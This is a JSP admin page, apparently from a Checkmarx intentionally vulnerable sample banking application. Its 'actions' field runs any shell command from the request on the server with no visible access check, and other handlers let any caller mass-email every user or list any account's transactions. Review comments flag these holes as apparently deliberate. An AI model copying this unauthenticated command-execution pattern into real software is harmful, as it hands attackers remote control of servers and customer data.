<form method=get action='hidden_AdminControl.jsp'>
Shell Command<br />
<input name='actions' type=text size="80"><br/>
<input type=submit value='Execute'><br /><br />
Automated shutdown message (sent to everyone by default)<br />
<input name='message' type=text size="80"><br />
<p><i>Send to Specific Users (semicolon separated list)</i><br />
<input name='users' type=text size="80"/><br/>
<input type=submit value='Broadcast Alert'>
<%@ page import="java.io.*" %>
<%@ page import="java.util.ArrayList" %>
<%@ page import="java.util.Iterator" %>
<%@ page import="java.util.List" %>
<%@ page import="java.util.StringTokenizer" %>
<%@ page import="com.checkmarx.samples.riches.oper.*" %>
<%@ page import="com.checkmarx.samples.riches.model.*" %>
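<%
// Emergency-broadcast handler for the 'message' / 'users' form fields.
// Reads: request parameters "message" and "users".
// Writes: a recipient list / count to the response via pageContext.getOut().
// Side effect: one SendMessage.execute() per recipient.
// NOTE(review): no authentication or authorization check is visible in this file even though the
// page is named "hidden_AdminControl.jsp"; the file name alone does not restrict who can reach it.
// Confirm an access check is enforced (filter or include) before this scriptlet runs.
String alertMessage = request.getParameter("message");
int messageCount = 0;
if (alertMessage != null && !alertMessage.isEmpty())
{
    SendMessage msgClass = new SendMessage();
    String specifiedUsers = request.getParameter("users");
    if (specifiedUsers != null && !specifiedUsers.isEmpty())
    {
        // The placeholder substitution does not depend on the recipient, so it is done once here
        // instead of once per loop iteration. The token is "<code1>" in this branch and "Code1" in
        // the all-users branch below; both are kept exactly as the original author wrote them.
        String processedMessage = alertMessage.replaceAll("<code1>",
            "The system is currently experiencing technical difficulties.");
        pageContext.getOut().print("<h1>Emergency Broadcast sent to users:</h1><pre>");
        for (String rawAddress : specifiedUsers.split(";"))
        {
            String emailAddress = rawAddress.trim();
            if (emailAddress.isEmpty())
            {
                continue; // "a;;b" or a trailing ';' would otherwise send to an empty address
            }
            // The address comes straight from the request; escape it before echoing it into HTML.
            pageContext.getOut().println(emailAddress.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;"));
            msgClass.setTo(emailAddress);
            msgClass.setSubject("Technical Difficulties");
            msgClass.setBody(processedMessage);
            msgClass.setSeverity("Highest");
            msgClass.execute();
            messageCount++;
        }
        pageContext.getOut().println("</pre>");
        pageContext.getOut().println("<h1>Emergency Broadcast sent to <i>" + messageCount + "</i> users.</h1><br/>");
    }
    else
    {
        // No explicit recipients: broadcast to every address the profile service knows about.
        String processedMessage = alertMessage.replaceAll("Code1",
            "The system is currently experiencing technical difficulties.");
        for (Object address : ProfileService.getAllEmail())
        {
            String emailAddress = (String) address;
            msgClass.setTo(emailAddress);
            msgClass.setSubject("Technical Difficulties");
            msgClass.setBody(processedMessage);
            msgClass.setSeverity("Highest");
            msgClass.execute();
            messageCount++;
        }
        pageContext.getOut().println("<h1>Emergency Broadcast sent to <i>" + messageCount + "</i> users.</h1><br/>");
    }
}
%>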
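<%
// Shell-command handler for the 'actions' form field: each ';'-separated entry is started as a
// separate process and its output is echoed back into the page.
// Reads: request parameter "actions". Writes: per-command headings and output to the response.
//
// SECURITY: this runs whatever string the request supplies, with the privileges of the servlet
// container, and no authentication or authorization check is visible in this file. The imports
// show this is part of a Checkmarx sample application, which presumably exhibits this on purpose;
// in any real application the feature must be removed, or at minimum restricted to a fixed
// allow-list of commands behind an admin check. The hardening below (stderr handling, resource
// cleanup, output escaping, error reporting) does not change that.
String cmd = request.getParameter("actions");
if (cmd != null && !cmd.isEmpty())
{
    boolean windows = System.getProperty("os.name", "").startsWith("Windows");
    for (String command : cmd.split(";"))
    {
        if (command.trim().isEmpty())
        {
            continue; // "a;;b" or a trailing ';' gives a blank entry; exec("") used to throw
        }
        // Tokenize on whitespace exactly as Runtime.exec(String) does, so the command that runs is
        // unchanged, but build it through ProcessBuilder so stderr can be merged into stdout.
        List<String> argv = new ArrayList<String>();
        if (windows)
        {
            argv.add("cmd.exe");
            argv.add("/C");
        }
        for (StringTokenizer tokens = new StringTokenizer(command); tokens.hasMoreTokens();)
        {
            argv.add(tokens.nextToken());
        }
        StringBuilder output = new StringBuilder();
        String error = null;
        try
        {
            ProcessBuilder builder = new ProcessBuilder(argv);
            // The original read only stdout: a command writing enough to stderr could block on a
            // full pipe and hang the request, and its error text was never shown.
            builder.redirectErrorStream(true);
            Process p = builder.start();
            BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
            try
            {
                String line;
                while ((line = reader.readLine()) != null)
                {
                    output.append(line).append("\r\n");
                }
            }
            finally
            {
                reader.close(); // the original never closed the stream
            }
            p.waitFor();
        }
        catch (IOException e)
        {
            // Previously swallowed silently, so a missing executable produced no output at all
            // and aborted every remaining command in the list.
            error = "Command could not be started.";
            application.log("hidden_AdminControl.jsp: command failed to start", e);
        }
        catch (InterruptedException e)
        {
            Thread.currentThread().interrupt();
            error = "Interrupted while waiting for the command to finish.";
        }
        // Both the command text and its output are request-controlled; escape before echoing.
        String safeCommand = command.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;");
        String safeOutput = output.toString().replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;");
        pageContext.getOut().println("<h1>Response from command <i>" + safeCommand + "</i></h1><br/>");
        if (error != null)
        {
            pageContext.getOut().println("<p>" + error + "</p>");
        }
        pageContext.getOut().println("<pre>" + safeOutput + "</pre>");
    }
}
%>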
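<%
// Debug-only account lookup for the 'acctno' form field (see the note under the form).
// Reads: request parameter "acctno". Writes: one <pre> line per transaction to the response.
// NOTE(review): the account number is taken from the request and is not checked against the
// current user's own accounts anywhere visible in this file, so any caller who reaches this page
// can list any account's transactions. That is the reason the note below says this code must go.
String accountNumber = request.getParameter("acctno");
if (accountNumber != null && !accountNumber.isEmpty())
{
    // Request-controlled text echoed into HTML: escape it once and reuse.
    String safeAccountNumber = accountNumber.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;");
    Long account = null;
    try
    {
        account = Long.valueOf(accountNumber.trim());
    }
    catch (NumberFormatException e)
    {
        // The original let this propagate, turning a typo in the form into an HTTP 500 with a stack trace.
        pageContext.getOut().println("<h1>Account number <i>" + safeAccountNumber + "</i> is not a valid number.</h1>");
    }
    if (account != null)
    {
        pageContext.getOut().println("<h1>Transactions reported from database for account <i>" + safeAccountNumber + "</i></h1>");
        try
        {
            for (Object row : TransactionService.getTransactions(account))
            {
                Transaction transaction = (Transaction) row;
                String transactionDescription = "Transaction reported [" + transaction.getId() + "]: "
                    + "Account " + transaction.getAcctno() + "; "
                    + "Amount " + transaction.getAmount() + "; "
                    + "Date " + transaction.getDate() + "; "
                    + "Description " + transaction.getDescription();
                // Description text comes from the database and may contain markup; escape it.
                pageContext.getOut().println("<pre>"
                    + transactionDescription.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
                    + "</pre>");
            }
        }
        catch (Exception e)
        {
            // Previously swallowed silently; keep the page usable but record the failure server-side
            // rather than exposing exception details to the caller.
            application.log("hidden_AdminControl.jsp: transaction lookup failed", e);
            pageContext.getOut().println("<p>Transactions could not be retrieved.</p>");
        }
    }
}
%>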
<br /><br /><b>Debug Code</b><br />
<i>Note: This code should be removed once debugging is complete for bug 192203 (inspection of database contents)</i><br />
Account Number <input name='acctno' type=text size="15"/><br />
<input type=submit value='Retrieve'>
</form>